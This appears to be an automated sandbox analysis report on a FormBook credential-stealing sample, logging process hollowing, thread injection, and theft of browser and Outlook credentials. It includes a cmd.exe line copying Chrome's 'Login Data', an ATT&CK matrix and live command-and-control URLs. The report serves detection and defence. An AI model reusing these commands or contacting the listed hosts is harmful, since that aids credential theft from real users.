Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Section unmapped: C:\Windows\SysWOW64\control.exe base address: EE0000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 337008	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Thread register set: target process: 3352	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Code function: 0_2_00007FF6EB1412EC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,

0_2_00007FF6EB1412EC

Source: explorer.exe, 00000006.00000000.308457203.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.343873023.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.329367879.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.373623864.0000000000B68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 00000006.00000000.373948721.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.329686282.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.308852769.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.344212452.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.347851017.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.373948721.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.329686282.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.313391567.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.308852769.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.344212452.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.373948721.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.329686282.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.308852769.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.344212452.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.373948721.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.329686282.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.308852769.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.344212452.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000000.352118636.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.317525490.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.336698892.0000000008778000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndh

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Queries volume information: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Queries volume information: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Queries volume information: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Code function: 0_2_00007FF6EB148964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,

0_2_00007FF6EB148964

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Code function: 0_2_00007FF6EB142C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,

0_2_00007FF6EB142C54

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.image.exe.3f466b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.image.exe.3d81990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.384175389.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.385133356.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.821203089.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.355695163.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.821135364.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.303243710.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.303491951.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.338080470.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.306533185.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\control.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\control.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.image.exe.3f466b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.image.exe.3d81990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.384175389.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.385133356.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.821203089.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.355695163.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.821135364.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.303243710.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.303491951.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.338080470.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.306533185.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Native API	11 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	812 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	11 Registry Run Keys / Startup Folder	4 Obfuscated Files or Information	Security Account Manager	117 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	3 Software Packing	NTDS	321 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	812 Process Injection	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Rundll32	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	42%	Virustotal		Browse
08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	60%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	44%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\Qplltzvap\d6wtv4o01bbhxt.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\Qplltzvap\d6wtv4o01bbhxt.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.0.RegSvcs.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
5.0.RegSvcs.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
5.0.RegSvcs.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
5.2.RegSvcs.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.perfectselfstorageaston.com/q36s/?1bGpqN=VigMRdHlcuoP+Sw3yuFwqC380HsjzcbE0b4n2u2ieXC1OCRINUCS2txvQYXeentP/kMQ&wFNT8=0jNDXxTXR8rtijfp	0%	Avira URL Cloud	safe
http://www.perfectselfstorageaston.com/q36s/	0%	Avira URL Cloud	safe
http://www.yokoi-tatami-lab.com/q36s/?1bGpqN=Ci79+kEJw4TCq7yLtV3k9oXgcXWe+c7BxrEK17mwieGIptEQJza+v2Dc8Iz1jOVSWisc&Vr=MBZl9ZMXj4u	0%	Avira URL Cloud	safe
http://www.flat-planet.com/q36s/	0%	Avira URL Cloud	safe
http://www.oooci.com/q36s/?1bGpqN=IHzjIaKw9hHBssJHvR7q+BIW1etDJxSUidZLadnwIl9v5RmtoBh2/TNAfU7VUcX2DTn2&wFNT8=0jNDXxTXR8rtijfp	0%	Avira URL Cloud	safe
http://www.searchvity.com/	100%	URL Reputation	malware
http://www.flat-planet.com/q36s/?1bGpqN=QZvQCpprdvdahDmS7NmKrSAADUyIV3QwKizJm0tHu4ylzR2u4nzvWcUcdlEm3O78XaNr&Vr=MBZl9ZMXj4u	0%	Avira URL Cloud	safe
http://www.getbraintruth.com/q36s/?1bGpqN=+82WZbOcHchnV2OkjKF3NixdkboeLFcgXndQeltEW38JzDdOoRl+u1EVmT0W3Jonz/Y6&wFNT8=0jNDXxTXR8rtijfp	0%	Avira URL Cloud	safe
http://www.gestaltants.com/q36s/?1bGpqN=Taj2aUXsQP+C4UcdcHZBeTyAvKtskpO/tWyZABwI4RRX1GdPLoNftssJ9pruDd6VDLGR&Vr=MBZl9ZMXj4u	0%	Avira URL Cloud	safe
http://www.computershit.net/q36s/	0%	Avira URL Cloud	safe
http://www.okargo.pro/q36s/?1bGpqN=FgZmHunv013Q9EOx8OzeBGKV8sIXYwnIYQMpCCMzOG6h6X8t3t+l8o1J2BnYMBVPpIZA&Vr=MBZl9ZMXj4u	0%	Avira URL Cloud	safe
http://www.unitedtrials.net/q36s/?1bGpqN=tC61wDElLuFqXOy7bNjE3R/KY1KZZj+Oe9iJyNVpeVf3JMOvufdGkYhMQuQyKkTwQ1EL&wFNT8=0jNDXxTXR8rtijfp	0%	Avira URL Cloud	safe
http://www.searchvity.com/?dn=	100%	Avira URL Cloud	malware
http://www.fraiuhs.com/q36s/?1bGpqN=KaI0Rj3wcsIqg8Lge9r70qxIl2ZARFR6pw9QZ8eIk4lgB884W2uHm2Neex91t0JOAHKn&wFNT8=0jNDXxTXR8rtijfp	100%	Avira URL Cloud	malware
http://www.fhpuyfpe.com/q36s/?1bGpqN=qjehMM29YnjvQ+IsXXvHiKjxodx29m58RRND8kRaJ9rSQmiI4bNYuG3T9nEMHR/0ZqgQ&wFNT8=0jNDXxTXR8rtijfp	0%	Avira URL Cloud	safe
http://www.computershit.net/q36s/?1bGpqN=u2o/mXnBhWEQf/pveWhGu62rKF+mK4qUp4dBBRZihtSbDfqqopE5TB84A5tdbEb+PdMV&wFNT8=0jNDXxTXR8rtijfp	0%	Avira URL Cloud	safe
http://www.perfectselfstorageaston.com	0%	Avira URL Cloud	safe
http://www.cosmosmeta.com/q36s/?1bGpqN=YsZgiMyir4QObMcXj4/OoGvu8CzjTsx3cWH2zl5uagrD8+tBN1FIEP+EOGgFqY0IHdLq&wFNT8=0jNDXxTXR8rtijfp	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.unitedtrials.net	74.208.236.190	true	false	high
www.perfectselfstorageaston.com	66.96.160.139	true	false	high
www.marketplaceimmo.com	217.160.0.132	true	false	high
www.okargo.pro	213.186.33.5	true	false	high
www.computershit.net	104.21.36.34	true	false	high
www.fraiuhs.com	162.0.233.84	true	false	high
gestaltants.com	34.102.136.180	true	false	high
www.cosmosmeta.com	52.20.84.62	true	false	high
ifsay8jx7m.hellomyai.com	134.122.133.172	true	false	high
www.getbraintruth.com	18.194.171.90	true	false	high
yokoi-tatami-lab.com	106.186.69.5	true	false	high
www.oooci.com	101.35.123.80	true	false	high
www.flat-planet.com	185.215.4.12	true	false	high
www.fhpuyfpe.com	unknown	unknown	false	high
www.gestaltants.com	unknown	unknown	false	high
www.wxiw.xyz	unknown	unknown	false	high
www.real-market-34.xyz	unknown	unknown	false	high
www.marsmoose.com	unknown	unknown	false	high
www.tutorgpa.com	unknown	unknown	false	high
www.yokoi-tatami-lab.com	unknown	unknown	false	high
www.strickercosolutions.com	unknown	unknown	false	high
www.us-paypal.online	unknown	unknown	false	high
www.libertymarket.net	unknown	unknown	false	high
www.punksparrow.com	unknown	unknown	false	high
www.boninvahas.club	unknown	unknown	false	high
www.drinco.club	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.perfectselfstorageaston.com/q36s/?1bGpqN=VigMRdHlcuoP+Sw3yuFwqC380HsjzcbE0b4n2u2ieXC1OCRINUCS2txvQYXeentP/kMQ&wFNT8=0jNDXxTXR8rtijfp	true	Avira URL Cloud: safe	unknown
http://www.perfectselfstorageaston.com/q36s/	true	Avira URL Cloud: safe	unknown
http://www.yokoi-tatami-lab.com/q36s/?1bGpqN=Ci79+kEJw4TCq7yLtV3k9oXgcXWe+c7BxrEK17mwieGIptEQJza+v2Dc8Iz1jOVSWisc&Vr=MBZl9ZMXj4u	true	Avira URL Cloud: safe	unknown
http://www.flat-planet.com/q36s/	true	Avira URL Cloud: safe	unknown
http://www.oooci.com/q36s/?1bGpqN=IHzjIaKw9hHBssJHvR7q+BIW1etDJxSUidZLadnwIl9v5RmtoBh2/TNAfU7VUcX2DTn2&wFNT8=0jNDXxTXR8rtijfp	true	Avira URL Cloud: safe	unknown
http://www.flat-planet.com/q36s/?1bGpqN=QZvQCpprdvdahDmS7NmKrSAADUyIV3QwKizJm0tHu4ylzR2u4nzvWcUcdlEm3O78XaNr&Vr=MBZl9ZMXj4u	true	Avira URL Cloud: safe	unknown
http://www.getbraintruth.com/q36s/?1bGpqN=+82WZbOcHchnV2OkjKF3NixdkboeLFcgXndQeltEW38JzDdOoRl+u1EVmT0W3Jonz/Y6&wFNT8=0jNDXxTXR8rtijfp	true	Avira URL Cloud: safe	unknown
http://www.gestaltants.com/q36s/?1bGpqN=Taj2aUXsQP+C4UcdcHZBeTyAvKtskpO/tWyZABwI4RRX1GdPLoNftssJ9pruDd6VDLGR&Vr=MBZl9ZMXj4u	false	Avira URL Cloud: safe	unknown
http://www.computershit.net/q36s/	true	Avira URL Cloud: safe	unknown
http://www.okargo.pro/q36s/?1bGpqN=FgZmHunv013Q9EOx8OzeBGKV8sIXYwnIYQMpCCMzOG6h6X8t3t+l8o1J2BnYMBVPpIZA&Vr=MBZl9ZMXj4u	true	Avira URL Cloud: safe	unknown
http://www.unitedtrials.net/q36s/?1bGpqN=tC61wDElLuFqXOy7bNjE3R/KY1KZZj+Oe9iJyNVpeVf3JMOvufdGkYhMQuQyKkTwQ1EL&wFNT8=0jNDXxTXR8rtijfp	true	Avira URL Cloud: safe	unknown
http://www.fraiuhs.com/q36s/?1bGpqN=KaI0Rj3wcsIqg8Lge9r70qxIl2ZARFR6pw9QZ8eIk4lgB884W2uHm2Neex91t0JOAHKn&wFNT8=0jNDXxTXR8rtijfp	true	Avira URL Cloud: malware	unknown
http://www.fhpuyfpe.com/q36s/?1bGpqN=qjehMM29YnjvQ+IsXXvHiKjxodx29m58RRND8kRaJ9rSQmiI4bNYuG3T9nEMHR/0ZqgQ&wFNT8=0jNDXxTXR8rtijfp	true	Avira URL Cloud: safe	unknown
http://www.computershit.net/q36s/?1bGpqN=u2o/mXnBhWEQf/pveWhGu62rKF+mK4qUp4dBBRZihtSbDfqqopE5TB84A5tdbEb+PdMV&wFNT8=0jNDXxTXR8rtijfp	true	Avira URL Cloud: safe	unknown
